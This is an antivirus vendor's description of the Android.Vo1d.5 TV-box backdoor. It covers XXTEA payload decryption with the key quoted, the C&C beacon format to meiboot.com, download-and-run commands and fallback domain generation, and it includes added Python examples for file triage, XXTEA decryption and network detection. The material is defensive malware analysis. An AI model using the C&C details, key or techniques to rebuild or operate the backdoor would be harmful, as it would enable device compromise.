
Android.Vo1d.5

Added to the Dr.Web virus database: 2024-07-26

Virus description added:

SHA1 hashes:

  • ed975255eba30345de74936e24b9b3090f26ed7e (/data/google/daemon)
  • 182939085a9aa1d6f0e60da31b200cd644522748 (a decrypted payload)

Description

This is a component of the malicious backdoor Android.Vo1d, which was detected in the system storage area of a number of Android-based TV box models. It is a daemon that performs various tasks on infected devices. Its functionality includes:

  • Decrypting the payload;
  • Communicating with the C&C server;
  • Downloading APK files (presumably);
  • Downloading and running native libraries.

Operating routine

Decrypting the payload

Android.Vo1d.5 extracts and decrypts a payload from itself, using the XXTEA algorithm with the key fPNH830ES23QOPIM*&S955(2WR@L*&GF. The decrypted object—the main Android.Vo1d.5 body—is loaded into memory.

Communicating with the C&C server

Via a POST request, Android.Vo1d.5 contacts the C&C server whose address is taken from a preassigned list. By default, the list has only a single address hxxp[:]//meiboot[.]com/api/config.

The request format is as follows:

POST hxxp[:]//meiboot[.]com/api/config
User-Agent: curl/7.64.0
Accept: */*
Content-Type: application/json;charset=UTF-8

An example of a request:
{
    "a": "32",
    "m": "debuggerd-11236.0",
    "s": "10",
    "u": "a1d4f55f6be3d743497fadee1d574b3357029c25"
}

where:

  • a — is a constant;
  • m — is a field that contains a string with information about the trojan’s process name as well as its pid and uid in <process_name>-<pid>.<uid> format;
  • s — is a constant;
  • u — is a session key that will encrypt the u and d fields (the latter is a URL) in responses from the server (these responses are described below).

The server responds with a JSON in one of several formats.

An example of response #1:
{
    "code": "200",
    "msg": [
        {
            "i": "",
            "v": "",
            "a": "",
            "u": ""
        },
        { ... }
    ]
}

where:

  • i — is the identifier of the loaded file;
  • v — is the identifier of the loaded file’s version;
  • a — is the request code;
  • u — is a link (encrypted with XXTEA) for downloading the file.

This response contains the list of commands that the trojan needs to execute.

Possible commands that can be issued by the C&C server:

  • 1 — download a file from the URL specified in the field u and put it in /data/system/users/.v/<id1>.<id2>;
  • 2 — re-download the file with the id i;
  • 3 — delete the file with the id i;
  • 4 — download the file from the specified URL and put it in the table, using the id i;
  • 5 — place the file in the table, using the id i.

The table above is a list of downloaded files, which the daemon goes through in another thread. Then it decrypts the downloaded files and puts the decrypted variants into one of the following directories:

  • /data/system/android.hardware.support@<id>.0.so (for Android API below version 29);
  • <prefix>/lib/arm/libsupport@<id>.0.so

Next, Android.Vo1d.5 launches these files by calling the function init exported by the .so files.
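As an added example (not Dr.Web's or the malware's code) of turning the file locations described above, together with the SHA1 hashes listed at the top of this description, into a triage check: given a listing of paths and hashes collected from a device (for instance via an adb shell session on a TV box), it flags the daemon location, the download store under /data/system/users/.v/, and the decrypted-library naming patterns. The listing used here is constructed; the <id>, <id1>, <id2> and <prefix> placeholders from the description are matched loosely because their real values are not given.

```python
import re
from typing import List, Optional, Tuple

# SHA1 hashes from the description.
KNOWN_SHA1 = {
    "ed975255eba30345de74936e24b9b3090f26ed7e": "Android.Vo1d.5 daemon (/data/google/daemon)",
    "182939085a9aa1d6f0e60da31b200cd644522748": "Android.Vo1d.5 decrypted payload",
}

# Locations named in the description. <id>, <id1>, <id2> and <prefix> are
# placeholders there, so any single path component is accepted in their place.
PATH_PATTERNS = [
    (re.compile(r"^/data/google/daemon$"), "daemon binary location"),
    (re.compile(r"^/data/system/users/\.v/[^/]+\.[^/]+$"), "downloaded-file store (command 1)"),
    (re.compile(r"^/data/system/android\.hardware\.support@[^/]+\.0\.so$"),
     "decrypted library (Android API below 29)"),
    (re.compile(r"^/.*/lib/arm/libsupport@[^/]+\.0\.so$"), "decrypted library (<prefix>/lib/arm)"),
]

Finding = Tuple[str, str]  # (path, reason)


def check_entry(path: str, sha1: Optional[str]) -> List[Finding]:
    """Return every reason a single (path, sha1) entry looks like a Vo1d artifact."""
    findings: List[Finding] = []
    if sha1 and sha1.lower() in KNOWN_SHA1:
        findings.append((path, "hash match: " + KNOWN_SHA1[sha1.lower()]))
    for pattern, label in PATH_PATTERNS:
        if pattern.match(path):
            findings.append((path, "path match: " + label))
    return findings


def check_listing(entries) -> List[Finding]:
    """Run check_entry over an iterable of (path, sha1-or-None) pairs."""
    out: List[Finding] = []
    for path, sha1 in entries:
        out.extend(check_entry(path, sha1))
    return out


# Constructed listing (not from a real device). The hashes on benign-looking
# lines are dummies so the output shows which rule fired.
SAMPLE_LISTING = [
    ("/data/google/daemon", "ed975255eba30345de74936e24b9b3090f26ed7e"),
    ("/data/system/users/.v/12.3", None),
    ("/data/system/android.hardware.support@12.0.so", "0" * 40),
    ("/data/app/lib/arm/libsupport@12.0.so", None),
    ("/system/lib/libc.so", "1" * 40),
]

if __name__ == "__main__":
    for path, reason in check_listing(SAMPLE_LISTING):
        print(path, "->", reason)
```

The hash check is case-insensitive because sha1sum output and vendor listings differ in case; the path rules deliberately do not anchor on the <id> values, so a new build that changes only the identifiers still matches.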

An example of response #2:

{
    "code": "200",
    "msg": {
        "i": "",
        "d": [
            "url_1",
            "url_2",
            "...",
            "url_n"
        ]
    }
}

where:

  • i — the interval between server requests;
  • d — the list of C&C server addresses. Each string in this list is encrypted with the XXTEA algorithm, using the session key from the request.

This command is used to add more C&C server addresses for the daemon to communicate with.
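Both the payload decryption described under "Decrypting the payload" and the encrypted u and d fields in the two responses above rely on XXTEA, so an analyst reproducing the traffic or unpacking the payload needs a reference implementation. The following is an added example, not Dr.Web's or the malware's code: the standard XXTEA block cipher (Wheeler and Needham's corrected block TEA) in pure Python with a byte-level wrapper. Everything the description does not state is an assumption and is labelled as such in the code: the standard delta 0x9E3779B9, little-endian 32-bit words, taking the first 16 bytes of a key string (the 32-character payload key or the 40-character session key) as the 128-bit key, and zero-padding of plaintext to a multiple of 4 bytes. If the sample uses a different key derivation or framing, only _key_words and _to_words need to change.

```python
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF

# Payload key quoted in the description (32 characters).
PAYLOAD_KEY = b"fPNH830ES23QOPIM*&S955(2WR@L*&GF"


def _key_words(key: bytes) -> list:
    """Four 32-bit key words. ASSUMPTION: first 16 key bytes, little-endian;
    the description does not say how Vo1d maps its key strings to 128 bits."""
    if len(key) < 16:
        raise ValueError("XXTEA needs at least 16 key bytes")
    return list(struct.unpack("<4I", key[:16]))


def _mx(sum_, y, z, p, e, k):
    # XXTEA mixing function. Masking once at the end is sound because y and z
    # are already 32-bit values and +, ^ and << only propagate bits upwards.
    return ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4)))
            ^ ((sum_ ^ y) + (k[(p & 3) ^ e] ^ z))) & MASK


def xxtea_encrypt_words(v, k):
    """Encrypt a list of 32-bit words in place order (standard btea, n > 1)."""
    v = list(v)
    n = len(v)
    if n < 2:
        return v
    rounds = 6 + 52 // n
    sum_ = 0
    z = v[-1]
    for _ in range(rounds):
        sum_ = (sum_ + DELTA) & MASK
        e = (sum_ >> 2) & 3
        for p in range(n - 1):
            y = v[p + 1]
            v[p] = (v[p] + _mx(sum_, y, z, p, e, k)) & MASK
            z = v[p]
        y = v[0]
        v[-1] = (v[-1] + _mx(sum_, y, z, n - 1, e, k)) & MASK
        z = v[-1]
    return v


def xxtea_decrypt_words(v, k):
    """Exact inverse of xxtea_encrypt_words: same rounds, walked backwards."""
    v = list(v)
    n = len(v)
    if n < 2:
        return v
    rounds = 6 + 52 // n
    sum_ = (rounds * DELTA) & MASK
    y = v[0]
    for _ in range(rounds):
        e = (sum_ >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = v[p - 1]
            v[p] = (v[p] - _mx(sum_, y, z, p, e, k)) & MASK
            y = v[p]
        z = v[-1]
        v[0] = (v[0] - _mx(sum_, y, z, 0, e, k)) & MASK
        y = v[0]
        sum_ = (sum_ - DELTA) & MASK
    return v


def _to_words(data: bytes) -> list:
    # ASSUMPTION: zero-pad to a multiple of 4 bytes, at least two words.
    n = max(8, (len(data) + 3) // 4 * 4)
    return list(struct.unpack("<%dI" % (n // 4), data.ljust(n, b"\x00")))


def _to_bytes(words: list) -> bytes:
    return struct.pack("<%dI" % len(words), *words)


def xxtea_encrypt(data: bytes, key: bytes) -> bytes:
    return _to_bytes(xxtea_encrypt_words(_to_words(data), _key_words(key)))


def xxtea_decrypt(blob: bytes, key: bytes) -> bytes:
    if len(blob) % 4 or len(blob) < 8:
        raise ValueError("ciphertext must be a multiple of 4 bytes and at least 8 bytes")
    words = struct.unpack("<%dI" % (len(blob) // 4), blob)
    return _to_bytes(xxtea_decrypt_words(words, _key_words(key)))


def decrypt_c2_field(blob: bytes, session_key: bytes) -> str:
    """Decrypt one encrypted u/d field from a server reply and strip the padding."""
    return xxtea_decrypt(blob, session_key).rstrip(b"\x00").decode("utf-8", "replace")
```

Usage: decrypt_c2_field(blob, b"a1d4f55f6be3d743497fadee1d574b3357029c25") with the session key the beacon sent, or xxtea_decrypt(payload, PAYLOAD_KEY) for the embedded body; a decryption under the wrong key or wrong word order yields bytes that will not decode as a URL, which is the quickest sign that one of the labelled assumptions does not hold for a given sample.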

Replenishing the C&C server address list locally

If Android.Vo1d.5 is unable to connect to any of the servers listed in the address table, the trojan generates several addresses on its own using the following scheme:

Server address      Domain
0a597f79d876441d    com
57fd438a26874780    xyz
1e93c45d9b414092    top
111a2e0d676a4e94    net

Android.Vo1d.5 takes a random server address from the table, appends a random domain from the table to it, and then tries to connect to the address it generated. The trojan’s authors likely planned to register such addresses so that the daemons could continue operating if any of the C&C server addresses got blocked.
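Two things from this description are directly usable on the network side: the request shape given under "Communicating with the C&C server" (POST to /api/config, the curl/7.64.0 User-Agent, the fixed a/m/s/u keys and the <process_name>-<pid>.<uid> form of m) and the fallback address scheme just described, which yields only 16 possible host names. The following added example (not Dr.Web's code) enumerates all fallback candidates, combines them with the default C&C host, and runs both a host match and a request-shape match over a constructed proxy log. The log format (method, URL, User-Agent and body, tab-separated) is an assumption made for the example; a real proxy export would need its own line parser.

```python
import json
import re
from itertools import product
from typing import List, Set, Tuple
from urllib.parse import urlparse

# Default C&C host from the description (written defanged there).
DEFAULT_C2_HOSTS = {"meiboot.com"}

# Locally generated fallback addresses: every server address in the table
# combined with every domain in the table.
FALLBACK_LABELS = ["0a597f79d876441d", "57fd438a26874780", "1e93c45d9b414092", "111a2e0d676a4e94"]
FALLBACK_TLDS = ["com", "xyz", "top", "net"]


def fallback_hosts() -> Set[str]:
    """All 16 host names the daemon can generate on its own."""
    return {"%s.%s" % (label, tld) for label, tld in product(FALLBACK_LABELS, FALLBACK_TLDS)}


KNOWN_HOSTS = DEFAULT_C2_HOSTS | fallback_hosts()

# Beacon shape from the request description.
BEACON_PATH = "/api/config"
BEACON_UA = "curl/7.64.0"
BEACON_KEYS = {"a", "m", "s", "u"}
M_FIELD = re.compile(r"^[^-]+-\d+\.\d+$")    # <process_name>-<pid>.<uid>
SESSION_KEY = re.compile(r"^[0-9a-f]{40}$")  # 40 hex characters, as in the example


def beacon_shape_matches(method: str, url: str, user_agent: str, body: str) -> bool:
    """True when a request looks like the Vo1d /api/config beacon regardless of host."""
    if method != "POST" or user_agent != BEACON_UA:
        return False
    if urlparse(url).path != BEACON_PATH:
        return False
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    if not isinstance(doc, dict) or set(doc) != BEACON_KEYS:
        return False
    return bool(M_FIELD.match(str(doc["m"])) and SESSION_KEY.match(str(doc["u"])))


def classify(method: str, url: str, user_agent: str, body: str) -> List[str]:
    """Reasons a single request is suspicious; empty list means clean."""
    reasons = []
    host = (urlparse(url).hostname or "").lower()
    if host in KNOWN_HOSTS:
        reasons.append("known Vo1d C&C host " + host)
    if beacon_shape_matches(method, url, user_agent, body):
        reasons.append("request matches Vo1d /api/config beacon shape")
    return reasons


def scan_log(text: str) -> List[Tuple[int, List[str]]]:
    """Each line: method, URL, User-Agent, body, tab-separated (constructed format)."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        parts = line.split("\t")
        if len(parts) != 4:
            continue
        reasons = classify(*parts)
        if reasons:
            hits.append((no, reasons))
    return hits


# Constructed log lines: a beacon to the default host, one to a fallback host,
# two unrelated requests, and a beacon-shaped request to a host not on the list.
SAMPLE_LOG = "\n".join([
    "POST\thttp://meiboot.com/api/config\tcurl/7.64.0\t" + json.dumps(
        {"a": "32", "m": "debuggerd-11236.0", "s": "10", "u": "a1d4f55f6be3d743497fadee1d574b3357029c25"}),
    "POST\thttp://57fd438a26874780.xyz/api/config\tcurl/7.64.0\t" + json.dumps(
        {"a": "32", "m": "vold-2210.1000", "s": "10", "u": "0" * 40}),
    "GET\thttp://example.org/api/config\tMozilla/5.0\t",
    "POST\thttp://example.org/api/config\tcurl/7.64.0\t" + json.dumps({"a": "1", "b": "2"}),
    "POST\thttp://update.example.org/api/config\tcurl/7.64.0\t" + json.dumps(
        {"a": "32", "m": "zygote-1.0", "s": "10", "u": "b" * 40}),
])

if __name__ == "__main__":
    for no, reasons in scan_log(SAMPLE_LOG):
        print(no, "; ".join(reasons))
```

The fifth line is the interesting one for detection engineering: the host list catches nothing there, but the request shape still does, which is what you want once the operators add addresses through response #2 or register a fallback domain not yet on a blocklist. Conversely, the host rule alone catches a beacon whose format changes in a later build.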

Artifacts

The Android.Vo1d.5 daemon contains the following strings:

  • C:/Users/dazhi/Desktop/dynamicbox/libsdk/external/libserver/server.c
  • C:/Users/dazhi/Desktop/dynamicbox/libsdk/external/libserver/record_stream.c

Indicators of compromise

News article about the trojan

Curing recommendations
Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android